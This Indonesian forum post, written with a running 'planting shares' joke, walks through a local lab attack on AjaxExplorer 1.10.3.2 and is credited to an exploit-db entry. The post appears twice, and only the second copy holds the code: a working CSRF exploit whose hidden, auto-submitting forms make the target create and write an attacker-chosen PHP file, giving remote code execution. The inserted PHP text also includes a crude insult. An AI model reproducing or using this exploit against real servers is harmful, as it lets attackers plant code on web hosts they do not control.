Menanam saham harus segera dilakukan sejak dini, agar nanti saat sudah semakin tua tidak terasa saham yang kita miliki semakin banyak. Namun jangan lupa, juga utk melakukan pendataan yang baik pada saham kita sendiri, takut lupa... kalo takut nyimpen saham sendirian, baik2 boleh share sama saya... pasti dijaga baik2... hehehhe... yah gak cess..?? [sahutin kingg..]
kenapa saya membuat judul menanam saham?? yaitu tadi karena menanam saham baik dilakukan sejak dini.
lalu apa itu AjaxExplorer? AjaxExplorer kalo saya bilang itu sama kaya tampilan folder dalam windows xp, cuman kemasannya dalam suatu website... gimana yah jelasinnya.. coba liat skrinsut dibawah
kaya gini:
![[Image: 13752efe49cb4261a4df4362ebc56f7d.png]](http://image.prntscr.com/image/13752efe49cb4261a4df4362ebc56f7d.png)
naahh kaya gitu, trus kenapa menanam saham di AjaxExplorer? dalam cerita2 korban papa minta saham seperti di tipi2... hhehhehee,,,, di AjaxExplorer ini membuat saham tidak sesulit saat papa minta saham...
naahh langsung aja kita coba simulasinya di localhost masing2... mohon maaf jika ada kekurangan, karena niatnya cuman saling belajar menanam saham utk masa depan bangsa dan keluarga sekalian.
pertama saya buat download file nya di https://sourceforge.net/projects/ajax-explorer/files/
truss extract, kemudian copas folder yg di extract td "AjaxExplorer 1.10.3.2" di xampp/htdocs
lalu install > > > > >
kalo udah di install
sekarang waktunya utk mencoba serangan RCE (Remote Code Execution)
buat direktori baru di htdocs, anggep aja ceritanya beda serper... jadi nanti targetnya http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/
dan si attacker atau penanam saham (yaitu elu) menggunakan http://localhost/attacker
trus, buat file baru misalnya index.php dalam folder C:\xampp\htdocs\attacker
Untuk memastikan kalau saham berhasil dimasukkan, mari kita pastikan dlu kalau folder C:\xampp\htdocs\AjaxExplorer 1.10.3.2 hanya berisi folder ajaxexplorer atau coba akses http://localhost/AjaxExplorer%201.10.3.2/hehehe.php, kalau object not found berarti belum ada. Karena pada
AjaxExplorer akan kita tanam file hehehe.php
![[Image: aa6b76f6ccf1401aa6f15d0f236ec6f6.png]](http://image.prntscr.com/image/aa6b76f6ccf1401aa6f15d0f236ec6f6.png)
kalo udah, sekarang coba akses http://localhost/attacker menggunakan browser kesayangan
naahhh, sekarang coba periksa kembali, apakah folder yg tadinya kosong ada isinya??
coba akses http://localhost/AjaxExplorer%201.10.3.2/hehehe.php
tadaaaaa.....
![[Image: affad427ab0b4561ad552b9e16abeef9.png]](http://image.prntscr.com/image/affad427ab0b4561ad552b9e16abeef9.png)
Sekian dari saya, semoga besok ada ide lagi... terimakasih
diterapkan dari sumber: https://www.exploit-db.com/exploits/39876/
kenapa saya membuat judul menanam saham?? yaitu tadi karena menanam saham baik dilakukan sejak dini.
lalu apa itu AjaxExplorer? AjaxExplorer kalo saya bilang itu sama kaya tampilan folder dalam windows xp, cuman kemasannya dalam suatu website... gimana yah jelasinnya.. coba liat skrinsut dibawah
kaya gini:
naahh kaya gitu, trus kenapa menanam saham di AjaxExplorer? dalam cerita2 korban papa minta saham seperti di tipi2... hhehhehee,,,, di AjaxExplorer ini membuat saham tidak sesulit saat papa minta saham...
naahh langsung aja kita coba simulasinya di localhost masing2... mohon maaf jika ada kekurangan, karena niatnya cuman saling belajar menanam saham utk masa depan bangsa dan keluarga sekalian.
pertama saya buat download file nya di https://sourceforge.net/projects/ajax-explorer/files/
truss extract, kemudian copas folder yg di extract td "AjaxExplorer 1.10.3.2" di xampp/htdocs
lalu install > > > > >
kalo udah di install
sekarang waktunya utk mencoba serangan RCE (Remote Code Execution)
buat direktori baru di htdocs, anggep aja ceritanya beda serper... jadi nanti targetnya http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/
dan si attacker atau penanam saham (yaitu elu) menggunakan http://localhost/attacker
trus, buat file baru misalnya index.php dalam folder C:\xampp\htdocs\attacker
Code:
<iframe name="DOOM" style="display:none" name="hidden-form"></iframe>
<form target="DOOM" id="CSRF2" method="post" action="
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php">
<input type="hidden" name="strPage" value="control/file/editor" />
<input type="hidden" name="strPath" value="D:/" />
<input type="hidden" name="strFile" value="hehehe.php" />
<input type="hidden" name="strText"
value="<?php echo'Saya menanam saham disini, jadi tolong jaga baik-baik anak kita. Jangan sampai masa dpan dia suram!! Apa lagi jadi Homo atau Hode utk naklukin siberking sama krucut di game onlen';?>" />
</form>
<form target="DOOM" id="CSRF1" method="post" action="
http://localhost/AjaxExplorer%201.10.3.2/ajaxexplorer/index.php">
<input type="hidden" name="strPage" value="control/file/create" />
<input type="hidden" name="strPath" value="D:/" />
<input type="hidden" name="strFile" value="D:/hehehe.php" />
<script>
document.getElementById('CSRF1').submit()
document.getElementById('CSRF2').submit()
</script>
</form>Untuk memastikan kalau saham berhasil dimasukkan, mari kita pastikan dlu kalau folder C:\xampp\htdocs\AjaxExplorer 1.10.3.2 hanya berisi folder ajaxexplorer atau coba akses http://localhost/AjaxExplorer%201.10.3.2/hehehe.php, kalau object not found berarti belum ada. Karena pada
AjaxExplorer akan kita tanam file hehehe.php
kalo udah, sekarang coba akses http://localhost/attacker menggunakan browser kesayangan
naahhh, sekarang coba periksa kembali, apakah folder yg tadinya kosong ada isinya??
coba akses http://localhost/AjaxExplorer%201.10.3.2/hehehe.php
tadaaaaa.....
Sekian dari saya, semoga besok ada ide lagi... terimakasih
diterapkan dari sumber: https://www.exploit-db.com/exploits/39876/
